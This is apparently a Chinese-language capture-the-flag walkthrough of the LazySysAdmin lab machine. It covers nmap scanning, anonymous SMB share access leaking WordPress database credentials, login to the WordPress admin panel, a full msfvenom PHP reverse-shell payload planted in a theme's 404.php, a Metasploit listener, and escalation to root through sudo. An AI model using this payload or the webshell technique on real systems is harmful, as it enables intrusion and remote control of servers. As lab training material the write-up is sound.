工具
靶机
kali linux
操作步骤
SMB介绍
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Inter)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为Samba。
SMB协议是基于TCP - NETBIOS下的,一般端口使用为139,445
SMB协议,计算机可以访问网络资源,下载对应的资源文件
IP扫描
netdisconver -r 192.168.2.1/24
结果:
靶场IP:192.168.2.140
信息探测
探测开放服务
root@kali:~# nmap -sV 192.168.2.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-17 10:46 EDT
Nmap scan report for LazySysAdmin.lan (192.168.2.140)
Host is up (0.0016s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
MAC Address: 08:00:27:CD:F3:3A (Oracle VirtualBox virtual NIC)
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.93 seconds
探测全部信息
注:-T4 指的是有4个进程
root@kali:~# nmap -A -v -T4 192.168.2.140
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-17 10:47 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating ARP Ping Scan at 10:47
Scanning 192.168.2.140 [1 port]
Completed ARP Ping Scan at 10:47, 0.21s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:47
Completed Parallel DNS resolution of 1 host. at 10:47, 0.00s elapsed
Initiating SYN Stealth Scan at 10:47
Scanning LazySysAdmin.lan (192.168.2.140) [1000 ports]
Discovered open port 3306/tcp on 192.168.2.140
Discovered open port 80/tcp on 192.168.2.140
Discovered open port 139/tcp on 192.168.2.140
Discovered open port 22/tcp on 192.168.2.140
Discovered open port 445/tcp on 192.168.2.140
Discovered open port 6667/tcp on 192.168.2.140
Completed SYN Stealth Scan at 10:47, 0.22s elapsed (1000 total ports)
Initiating Service scan at 10:47
Scanning 6 services on LazySysAdmin.lan (192.168.2.140)
Completed Service scan at 10:47, 11.02s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against LazySysAdmin.lan (192.168.2.140)
NSE: Script scanning 192.168.2.140.
Initiating NSE at 10:47
Completed NSE at 10:47, 10.18s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Nmap scan report for LazySysAdmin.lan (192.168.2.140)
Host is up (0.00090s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 192.168.2.165
|_ error: Closing link: (nmap@192.168.2.165) [Client exited]
MAC Address: 08:00:27:CD:F3:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.004 days (since Sat Aug 17 10:41:48 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -3h19m59s, deviation: 5h46m24s, median: 0s
| nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| LAZYSYSADMIN<00> Flags: <unique><active>
| LAZYSYSADMIN<03> Flags: <unique><active>
| LAZYSYSADMIN<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: lazysysadmin
| NetBIOS computer name: LAZYSYSADMIN\x00
| Domain name: \x00
| FQDN: lazysysadmin
|_ System time: 2019-08-18T00:47:39+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-08-17 10:47:39
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 0.90 ms LazySysAdmin.lan (192.168.2.140)
NSE: Script Post-scanning.
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Initiating NSE at 10:47
Completed NSE at 10:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.91 seconds
Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.302KB)
我们先进入该网站查看一下相关信息
一番浏览,没有任何有用的信息
接下来我们开始尝试对相关开放的服务进行分析,我们发现有22,139,445,33060,80,6667这几个端口开放
我们先从大于1024的端口入手
在Firefox中输入http://192.168.2.140:6667/,进入该网页
结果,没有任何信息。接下来我们尝试分析其它服务
针对SMB协议弱点分析
1.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看;
smbclient -L IP //查看SMB文件目录
smbclient '\\IP\$share' //查看SMB文件
get 敏感文件 //下载文件
2.针对SMB协议远程溢出漏洞进行分析;
searchsploit samba版本号 //搜索smb远程溢出漏洞
我们先查看一下SMB文件目录
root@kali:~# smbclient -L 192.168.2.140
Enter WORKGROUP\root's password:
我们发现有密码,我们尝试一下空口令登陆
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
登陆成功,接下来我们尝试进行深入探测。
我们进入print$文件
登陆失败,进入share$文件
登陆成功,我们看一下目录
退出share$文件,我们查看一下IPC $文件
登陆成功,但里面没有任何信息,这时我们进入share$文件,查找敏感信息。
我们下载deets.txt, robots.txt, todolist.txt文件。然后我们进入wordpress文件夹查看相关内容
smb: \> get deets.txt
getting file \deets.txt of size 139 as deets.txt (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \> get robots.txt
getting file \robots.txt of size 92 as robots.txt (18.0 KiloBytes/sec) (average 9.8 KiloBytes/sec)
smb: \> get todolist.txt
getting file \todolist.txt of size 79 as todolist.txt (15.4 KiloBytes/sec) (average 10.8 KiloBytes/sec)
smb: \> cd wordpress
smb: \wordpress\> ls
. D 0 Sat Aug 17 06:35:47 2019
.. D 0 Tue Aug 15 07:05:52 2017
wp-config-sample.php N 2853 Wed Dec 16 04:58:26 2015
wp-trackback.php N 4513 Fri Oct 14 15:39:28 2016
wp-admin D 0 Wed Aug 2 17:02:02 2017
wp-settings.php N 16200 Thu Apr 6 14:01:42 2017
wp-blog-header.php N 364 Sat Dec 19 06:20:28 2015
index.php N 418 Tue Sep 24 20:18:11 2013
wp-cron.php N 3286 Sun May 24 13:26:25 2015
wp-links-opml.php N 2422 Sun Nov 20 21:46:30 2016
readme.html N 7413 Sat Aug 17 06:35:47 2019
wp-signup.php N 29924 Tue Jan 24 06:08:42 2017
wp-content D 0 Sat Aug 17 06:52:24 2019
license.txt N 19935 Sat Aug 17 06:35:47 2019
wp-mail.php N 8048 Wed Jan 11 00:13:43 2017
wp-activate.php N 6864 Sat Aug 17 06:35:47 2019
.htaccess H 35 Tue Aug 15 07:40:13 2017
xmlrpc.php N 3065 Wed Aug 31 12:31:29 2016
wp-login.php N 34347 Sat Aug 17 06:35:47 2019
wp-load.php N 3301 Mon Oct 24 23:15:30 2016
wp-comments-post.php N 1627 Mon Aug 29 08:00:32 2016
wp-config.php N 3703 Mon Aug 21 05:25:14 2017
wp-includes D 0 Wed Aug 2 17:02:03 2017
3029776 blocks of size 1024. 1452424 blocks available
smb: \wordpress\>
我们发现了wp-config.php文件,我们下载下来
我们逐个查看文件,看看有没有有用的信息。
root@kali:~# gedit wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'Admin');
/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'SAq-)W,-K9tFcW(=?ro4SJ5)R.mx%+@KL-I@PB{<-i>g3n^1|E<-uN|}F;:PbMYJ');
define('SECURE_AUTH_KEY', 'u .o%Ld%m27waNqK+*`~&j6~v!d7vI|OwA|hd8%r#ri_`WRIcCN-KiTSWmk)1;xG');
define('LOGGED_IN_KEY', 'iX^NN~N7R5Mdmeh:$iLY60r~K[)^f5vk`wGDO30r8Ns)gA17FRt2|$#S!Lq@-<|`');
define('NONCE_KEY', ',_xAk=+)B7f_a|#J44}qWca!=`s4{C2.Xe>sY%4Ybd5*3z9WRH-ysm=.|Gm^McvU');
define('AUTH_SALT', '(:^<BWwzWYx ,f^9anxD,+V+2-&,VJ@@)U7CSzjv_MvD67>?05ihCG]Q1K:_7Xsa');
define('SECURE_AUTH_SALT', 'ud]}}0rWRMGZ+a`Hky G7|i|+c7YyH4=l#5{/1R=|]PYrOmN{&0JuqkO=o5vyGg5');
define('LOGGED_IN_SALT', '=M_DRp%vGmijIhl%K!(v>:,*RR<cl9ahav%{q`&I/0HD/$W/LK:mxR37PKh?Zzi8');
define('NONCE_SALT', 'ABOgE>G:U;Q/hO^>jBG5e96OL6+{=mV,|2S~c,~dhVa!E/&Q[Mc8#IgVTuXAI}sY');
;
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
define('WP_DEBUG', false);
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* Dynamic site URL added by Togie */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
我们在deets.txt文件中发现了一个password:12345
我们在wp-config.php文件中发现了mysql的username和password。
我们也知道靶机开放3306端口,所以我们可以尝试一下远程连接。
我们发现,该服务器不允许数据库远程连接。
我们再尝试一下漏洞查询
root@kali:~# searchsploit smbd 3.X - 4.X
Exploits: No Result
Shellcodes: No Result
root@kali:~# searchsploit smbd 4.3.11-Ubuntu
Exploits: No Result
Shellcodes: No Result
我们没有找到任何漏洞。我可以再尝试一下ssh连接
密码输入的就是wp-config.php中爆出来的password和deets.txt爆出来的password。
Admin@192.168.2.140's password:
Permission denied, please try again.
Admin@192.168.2.140's password:
Permission denied, please try again.
结果依旧不尽人意。
那我们就只好去扫描一下目录了
针对HTTP协议弱点分析
1.浏览器查看网站
2.使用dirb nikto探测
3.寻找突破点,目标登陆后台,上传webshell;
在dirb扫描中我们发现了敏感文件
打开该链接
我们进入了该网站的后台,输入mysql中爆出来的username和password。
我们进入了后台。
制作webshell
制作方法
msfvenom -p php/meterpreter/reverse_tcp lhost=kali_ip lport=4444 -f raw
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.2.165 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.2.165'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
我们把源代码去掉注释,复制到文件中生成webshell
启动监听
启动metasploit
然后启动监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.2.140
lhost => 192.168.2.140
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.140 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > run
[-] Handler failed to bind to 192.168.2.140:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
现在,kali正在监听靶机的4444端口。
接下来,我们上传webshell
上传webshell
使用找到的敏感信息登陆系统后台,上传webshell。执行webshell(访问具有webshell的php页面)
获得反弹的shell
wordpress 上传点 theme 404.php
执行:http://ip_address/wordpress/wp-content/themes/twentyfifteen/404.php(稍后讲解)
我们打开Firefox,进入后台
点击
,再点击Editor
页面如下:
点击旁边的404-Template,将源代码粘贴上去,然后点击update File按钮。
点击完毕后,会出现以下结果:
编辑成功。接下来,我们进入webshell。
输入:http://192.168.2.140/wordpress/wp-content/themes/twentyfifteen/404.php,我们发现msf这边有反应
我们查看当前用户
我们发现,终端不识别id,那么我们就用shell
进入shell后,我们先查看当前目录
meterpreter > shell
Process 1521 created.
Channel 0 created.
ls
404.php
archive.php
author-bio.php
comments.php
content-link.php
content-none.php
content-page.php
content-search.php
content.php
css
footer.php
functions.php
genericons
header.php
image.php
inc
index.php
js
page.php
readme.txt
rtl.css
screenshot.png
search.php
sidebar.php
single.php
style.css
我们把shell改成终端形式
我们查看一下用户信息
我们发现有一个在/home中的用户
我们切换成该用户
这里需要密码,我们可以试一下deets.txt文件中的密码
成功进入
这时我们查看一下目录
我们发现cd命令受限
我们尝试一下切换到root
我们先列出togie用户的权限
sudo -l
togie@LazySysAdmin:/var/www/html/wordpress/wp-content/themes/twentyfifteen$ sudo -l
</html/wordpress/wp-content/themes/twentyfifteen$ sudo -l
[sudo] password for togie: 12345
Matching Defaults entries for togie on LazySysAdmin:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User togie may run the following commands on LazySysAdmin:
(ALL : ALL) ALL
-l, –list 列出用户权限或检查某个特定命令;对于长格式,使用两次
我们发现该用户可以切换成root
切换成功,接下来我们寻找flag
root@LazySysAdmin:~# ls
ls
proof.txt
root@LazySysAdmin:~# cat proof.txt
cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
Well done :)
Hope you learn't a few things along the way.
Regards,
Togie Mcdogie
Enjoy some random strings
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
(按理说proof应该就是flag,我也很尴尬)
总结
对于开放139和445端口的机器一定要注意是否可以直接使用smbclient登录到共享目录查找敏感文件。
一般情况下flag值都在/root目录下,并且需要提升root权限才能查看内容;
238
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
